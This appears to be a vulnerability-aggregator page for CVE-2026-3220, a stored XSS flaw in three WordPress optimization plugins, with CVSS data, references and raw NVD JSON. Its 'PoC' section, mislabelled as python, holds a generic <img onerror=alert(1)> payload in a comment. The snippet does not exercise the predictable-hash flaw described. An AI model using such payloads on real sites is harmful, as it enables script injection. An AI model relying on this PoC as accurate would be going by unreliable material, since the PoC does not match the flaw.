CVE-2026-3220

Description

The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Autoptimize < 3.1.15

Clearfy Cache < 2.4.2

Speed Optimizer < 7.7.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- 
  Conceptual PoC for CVE-2026-3220 
  This demonstrates how an attacker might inject a payload 
  that bypasses the minification logic due to predictable hashing.
-->

<!-- 
  Vulnerable Input Example: 
  An attacker submits a comment containing a payload designed to 
  break out of the intended HTML structure during minification.
-->
<div class="comment">
  <p>
    <!-- 
      The payload attempts to inject an arbitrary attribute. 
      If the plugin replaces a predictable string with a hash, 
      the regex might allow closing the current tag and opening a new one.
    -->
    Nice post! <img src=x onerror=alert(1) >
  </p>
</div>

<script>
  // If the vulnerability is exploited, the rendered HTML will include the onerror attribute.
  console.log('If an alert pops up, the PoC is successful.');
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3220
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3220
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3220/
[4] VulDB https://vuldb.com/cve/CVE-2026-3220
[5] https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3220", "sourceIdentifier": "[email protected]", "published": "2026-05-18T07:16:12.270", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/", "source": "[email protected]"}]}}